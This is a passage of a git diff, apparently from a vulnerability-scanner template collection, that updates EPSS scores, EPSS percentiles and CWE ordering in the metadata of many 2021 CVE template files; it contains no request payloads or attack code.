+ epss-percentile: 0.6977 cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index 6a6615ba4c..e813bf21ea 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-37833 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.3762 + epss-percentile: 0.37672 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index 00c1eedd96..de96458770 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-38314 cwe-id: CWE-916,CWE-200 epss-score: 0.00153 - epss-percentile: 0.51423 + epss-percentile: 0.51489 cpe: cpe:2.3:a:redux:gutenberg_template_library_\&_redux_framework:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 5e6ff91269..ee7c708928 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -17,9 +17,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-38540 - cwe-id: CWE-269,CWE-306 - epss-score: 0.01259 - epss-percentile: 0.84036 + cwe-id: CWE-306,CWE-269 + epss-score: 0.01445 + epss-percentile: 0.85241 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index 1fdc547ef5..fedcffdf77 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-38647 cwe-id: CWE-287 - epss-score: 0.97257 - epss-percentile: 0.99815 + epss-score: 0.97408 + epss-percentile: 0.99918 cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index cc2d6fd28b..0bdf0b6367 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 - epss-score: 0.0076 - epss-percentile: 0.79019 + epss-score: 0.00626 + epss-percentile: 0.76687 cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 395b559e80..1d5d341a3f 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-38704 cwe-id: CWE-79 epss-score: 0.00141 - epss-percentile: 0.49603 + epss-percentile: 0.49709 cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index feaa3038bc..7e85d25def 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-38751 cwe-id: CWE-116 epss-score: 0.00242 - epss-percentile: 0.61927 + epss-percentile: 0.62095 cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39141.yaml b/http/cves/2021/CVE-2021-39141.yaml index 6602c6d874..49b7b68ffe 100644 --- a/http/cves/2021/CVE-2021-39141.yaml +++ b/http/cves/2021/CVE-2021-39141.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39141 cwe-id: CWE-434 epss-score: 0.25418 - epss-percentile: 0.96223 + epss-percentile: 0.96252 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index ef0c2c037b..6fd21ea712 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39144 cwe-id: CWE-306,CWE-502 epss-score: 0.96272 - epss-percentile: 0.99402 + epss-percentile: 0.99419 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 7507dc3359..c653469e67 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39146 cwe-id: CWE-434 epss-score: 0.27391 - epss-percentile: 0.96325 + epss-percentile: 0.96357 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index bd07289774..40675a3ca5 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.01242 - epss-percentile: 0.83894 + epss-percentile: 0.83992 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 7f8696f47e..555d281194 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-39165 cwe-id: CWE-287 - epss-score: 0.06757 - epss-percentile: 0.93121 + epss-score: 0.06796 + epss-percentile: 0.93198 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 29c3a30b62..f2e2990914 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-39211 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.00166 - epss-percentile: 0.5314 + epss-percentile: 0.53226 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 48ff542621..64ccbfc7ba 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39226 cwe-id: CWE-287 epss-score: 0.92988 - epss-percentile: 0.98816 + epss-percentile: 0.98851 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index 893c620fea..5ba0e1d3fa 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-39312 cwe-id: CWE-22 - epss-score: 0.07512 - epss-percentile: 0.9342 + epss-score: 0.14099 + epss-percentile: 0.95161 cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index 1daf0b6c4f..4548bde2f2 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-39316 cwe-id: CWE-22 epss-score: 0.38985 - epss-percentile: 0.96874 + epss-percentile: 0.96896 cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 14666b3d30..70929bb901 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39320 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.58737 + epss-percentile: 0.58906 cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 4b14063014..50a60ac8f7 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39322 cwe-id: CWE-79 epss-score: 0.00234 - epss-percentile: 0.61253 + epss-percentile: 0.61417 cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 82057b95cb..9e210dbab1 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-39327 - cwe-id: CWE-459,CWE-200 - epss-score: 0.13882 - epss-percentile: 0.95098 + cwe-id: CWE-200,CWE-459 + epss-score: 0.14919 + epss-percentile: 0.95277 cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 83cf5da912..de14e09116 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39350 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.42118 + epss-percentile: 0.42206 cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 774c6eb085..decc95381a 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-39433 epss-score: 0.00637 - epss-percentile: 0.76776 + epss-percentile: 0.76867 cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 9a43276813..e9ea03e226 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-39501 cwe-id: CWE-601 epss-score: 0.00093 - epss-percentile: 0.39063 + epss-percentile: 0.39116 cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index 89d5cc3a6b..3fbae067f8 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.9 cve-id: CVE-2021-40149 cwe-id: CWE-552 - epss-score: 0.00689 - epss-percentile: 0.77833 + epss-score: 0.00888 + epss-percentile: 0.8079 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index e16e915158..8c791d5d72 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40150 cwe-id: CWE-552 - epss-score: 0.01002 - epss-percentile: 0.81885 + epss-score: 0.01009 + epss-percentile: 0.82012 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 5ac4b6829a..995caa68b7 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40323 cwe-id: CWE-94 - epss-score: 0.02175 - epss-percentile: 0.88161 + epss-score: 0.02948 + epss-percentile: 0.89814 cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index ee96b6f9f8..a02be4d93c 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -17,11 +17,11 @@ info: cvss-score: 9 cve-id: CVE-2021-40438 cwe-id: CWE-918 - epss-score: 0.97178 - epss-percentile: 0.99766 + epss-score: 0.9712 + epss-percentile: 0.99746 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: apache product: http_server tags: cve,cve2021,ssrf,apache,mod-proxy,kev diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 6b479e15fa..2927625e0c 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40539 cwe-id: CWE-706 epss-score: 0.97412 - epss-percentile: 0.99915 + epss-percentile: 0.9992 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index f8d32dfff9..6766bff0d9 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40542 cwe-id: CWE-79 epss-score: 0.00643 - epss-percentile: 0.76911 + epss-percentile: 0.77004 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index bed9a85261..f84b5f8409 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-40661 cwe-id: CWE-22 epss-score: 0.00964 - epss-percentile: 0.81511 + epss-percentile: 0.81583 cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index f01659ce61..c68ca0f217 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40822 cwe-id: CWE-918 - epss-score: 0.63541 - epss-percentile: 0.97543 + epss-score: 0.661 + epss-percentile: 0.97627 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index 4dc2bdf7ce..316ee3224e 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40856 cwe-id: CWE-706 - epss-score: 0.04946 - epss-percentile: 0.91954 + epss-score: 0.19673 + epss-percentile: 0.95858 cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index 5125fc2cf8..1d4ca7094b 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40859 epss-score: 0.02655 - epss-percentile: 0.89258 + epss-percentile: 0.89305 cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 2fed6068f2..0842e4e48c 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40868 cwe-id: CWE-79 epss-score: 0.00379 - epss-percentile: 0.69906 + epss-percentile: 0.70078 cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 0edc81c8d7..ab0a372487 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40870 cwe-id: CWE-23 - epss-score: 0.91378 - epss-percentile: 0.98626 + epss-score: 0.87964 + epss-percentile: 0.98406 cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 6e9a918be3..e4c6227579 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40875 cwe-id: CWE-425 - epss-score: 0.18757 - epss-percentile: 0.9573 + epss-score: 0.25891 + epss-percentile: 0.96278 cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index 31274b8976..ea884c31fc 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40908 cwe-id: CWE-89 - epss-score: 0.02031 - epss-percentile: 0.87685 + epss-score: 0.02266 + epss-percentile: 0.88471 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml index 96144a21da..3168f07aff 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40960 cwe-id: CWE-22 epss-score: 0.00946 - epss-percentile: 0.81337 + epss-percentile: 0.81404 cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 2e6825af10..8e7cd0bffd 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40968 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51215 + epss-percentile: 0.51305 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 2b78aaa2f1..1da8003947 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40969 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51215 + epss-percentile: 0.51305 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index b5a48a7043..1d1bf3feeb 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40970 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51215 + epss-percentile: 0.51305 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 76c2a8837b..e59099882b 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40971 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51215 + epss-percentile: 0.51305 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 366f9e54c5..ec890f72a4 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40972 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51215 + epss-percentile: 0.51305 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index d911bd5ec8..922ec4de71 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-40973 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51215 + epss-percentile: 0.51305 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index a98b9a6c66..8d76365477 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40978 cwe-id: CWE-22 - epss-score: 0.0345 - epss-percentile: 0.90474 + epss-score: 0.03461 + epss-percentile: 0.90554 cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 47c25a1bb1..09786c1776 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-41174 cwe-id: CWE-79 - epss-score: 0.96462 - epss-percentile: 0.9947 + epss-score: 0.96439 + epss-percentile: 0.99477 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index d35994affc..c2d9532790 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-41192 cwe-id: CWE-1188 epss-score: 0.00805 - epss-percentile: 0.79714 + epss-percentile: 0.79795 cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index adaa1bf273..1a644327c8 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-41266 cwe-id: CWE-306 epss-score: 0.05383 - epss-percentile: 0.92326 + epss-percentile: 0.9237 cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 071f741daa..24693407fe 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41277 cwe-id: CWE-22,CWE-200 - epss-score: 0.06768 - epss-percentile: 0.93128 + epss-score: 0.05804 + epss-percentile: 0.92626 cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index f10e0af819..7b6fea7f6f 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-41282 cwe-id: CWE-74 epss-score: 0.97392 - epss-percentile: 0.99901 + epss-percentile: 0.99908 cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index f0cde69d4a..42e927aea1 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-41291 cwe-id: CWE-22 epss-score: 0.03741 - epss-percentile: 0.90833 + epss-percentile: 0.90901 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index c385c197dd..a42049d724 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41293 cwe-id: CWE-22 epss-score: 0.03741 - epss-percentile: 0.90833 + epss-percentile: 0.90901 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 3348803119..9ce39cb3d1 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-41349 - epss-score: 0.80773 - epss-percentile: 0.9802 + epss-score: 0.84327 + epss-percentile: 0.9821 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index 938c6510ae..b05df4e2eb 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-41381 cwe-id: CWE-22 epss-score: 0.10127 - epss-percentile: 0.94346 + epss-percentile: 0.94375 cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 0c6e52fb9d..5d2aad668b 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2021-41432 cwe-id: CWE-79 - epss-score: 0.00084 - epss-percentile: 0.3487 + epss-score: 0.00067 + epss-percentile: 0.27822 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 9bd6329978..02ac9ad1be 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41460 cwe-id: CWE-89 - epss-score: 0.00937 - epss-percentile: 0.81232 + epss-score: 